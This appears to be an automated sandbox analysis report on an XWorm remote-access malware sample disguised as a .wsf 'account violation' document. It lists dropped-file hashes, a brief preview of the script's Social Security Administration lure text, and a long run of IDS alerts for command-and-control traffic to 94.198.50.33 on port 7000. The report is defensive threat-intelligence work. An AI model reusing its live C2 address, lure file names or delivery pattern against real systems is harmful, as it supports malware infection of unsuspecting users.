                                        • 94.198.50.33
                                        Zoom_Invite.call-660111329517.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        reported_account_information-pdf-66268481.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        No context
                                        No context
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):323
                                        Entropy (8bit):5.363435887027673
                                        Encrypted:false
                                        SSDEEP:6:Q3La/xwcz92W+P12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hz92n4M9tDLI4MWuPTAv
                                        MD5:A92E44C0313DAFEC1988D0D379E41A2F
                                        SHA1:C2F5644C418A81C1FB40F74298FF39D1420BFAC0
                                        SHA-256:F3F3E681BE07C36042639B1679ACF8B2D23BE037713D5E395C48006840DBE77A
                                        SHA-512:4F32FE6F35FC6EB4D4CF41EDEDE3C6B3FDFE31E58DA6FC7B301B1EBD3FBEEE64681C928B45E87CD556A1D32D32CB5932764EAB22FFEE11E42B8D5EB0DCFDC22C
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        File type:HTML document, Non-ISO extended-ASCII text, with very long lines (824), with CRLF line terminators
                                        Entropy (8bit):5.143859491299026
                                        TrID:
                                          File name:reported_account_violation-pdf-67223451.wsf
                                          File size:4'987 bytes
                                          MD5:fb43dcd8581a7cded732e93b9b6b61a1
                                          SHA1:f61761d095c2b193ce07529ac13ad6d622b64699
                                          SHA256:d3036ee6b4f2717e05a9a2b62bba456dd5b4c0f353517676318a609976f0b5a5
                                          SHA512:9087414376a0d88dd635517a3a6ee1cb706a4725b28ee8633330e9d34c6761ae4558af553e517d9d69973e08a483b35cabbc118e21f069e5fd91bc67ec61e516
                                          SSDEEP:96:TcxWXrHfYiu03P/hyUMl2N6SmxV3xzjpe50ycIBvRVM:C0rTuI3HM06SifzjpeeycaR6
                                          TLSH:BDA10872764C76724EE38142794B2A95D72DD82C237706A4789C0D2E9312EE0C3BBEDD
                                          File Content Preview:<package>..<job id="manage-udmwxwjzbz">..<script language="VBScript">....'NOTE : The Social Security Administration (SSA) is a cornerstone of the United States. social safety net, playing an indispensable role in providing financial security to million
                                          Icon Hash:68d69b8f86ab9a86
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-09-25T09:27:28.851237+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.449730188.114.97.3443TCP
                                          2024-09-25T09:28:02.698762+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:02.698762+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:03.806248+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:28:04.018372+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:04.020869+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:28:14.657329+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:14.661093+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:28:25.301072+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:25.305906+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:28:32.951908+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:32.951908+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:32.951973+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:32.951973+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:35.939132+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:35.973470+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:28:46.579768+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:46.582091+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:28:57.437286+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:57.439022+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:28:57.439878+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:00.615414+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:00.617295+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:02.698036+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:02.698036+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:06.691265+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:06.693107+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:12.344456+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:12.346517+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:12.731024+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:12.732427+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:12.896075+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:12.900428+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:13.939256+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:13.943064+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:18.313370+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:18.315753+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:28.954074+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:28.955634+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:32.359576+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:32.361186+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:32.720920+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:32.720920+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:35.235820+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:35.238309+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:36.313135+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:36.315050+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:44.547276+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:44.548921+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:49.522424+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:49.741529+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:49.743526+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:29:53.797637+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:29:53.800337+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:00.251320+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:00.253103+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:02.734763+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:02.734763+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:04.507181+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:04.509923+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:05.972774+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:05.974744+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:06.093990+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:06.095464+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:06.509592+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:06.511393+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:06.537619+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:06.540199+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:06.722549+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:06.724474+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:06.840706+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:06.842213+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:11.672331+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:11.675186+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:22.313052+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:22.318074+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:24.344351+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:24.406761+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:32.749390+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:32.749390+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:33.468956+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:33.470999+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:44.110694+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:44.112759+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:48.363811+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:48.365841+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:48.480095+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:48.481637+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:48.599726+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:48.601533+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:52.907251+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:52.909141+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:53.735988+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:53.737447+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:53.853121+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:53.854627+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:53.971785+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:53.973141+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:54.089902+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:54.091411+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:54.370854+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:54.373408+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:57.283156+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:57.289124+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:59.094980+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:59.134395+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:30:59.765582+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:30:59.767139+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:02.743288+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:02.743288+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:05.265400+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:05.269986+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:05.384805+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:05.386296+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:05.504500+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:05.627791+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:05.739640+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:05.741412+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:05.857853+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:05.859321+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:05.982130+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:06.100063+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:06.108967+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:06.215857+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:06.217483+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:11.375639+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:11.383035+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:14.753527+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:14.755266+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:23.297103+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
                                          2024-09-25T09:31:23.300481+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.46399494.198.50.337000TCP
                                          2024-09-25T09:31:31.751048+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.198.50.337000192.168.2.463994TCP
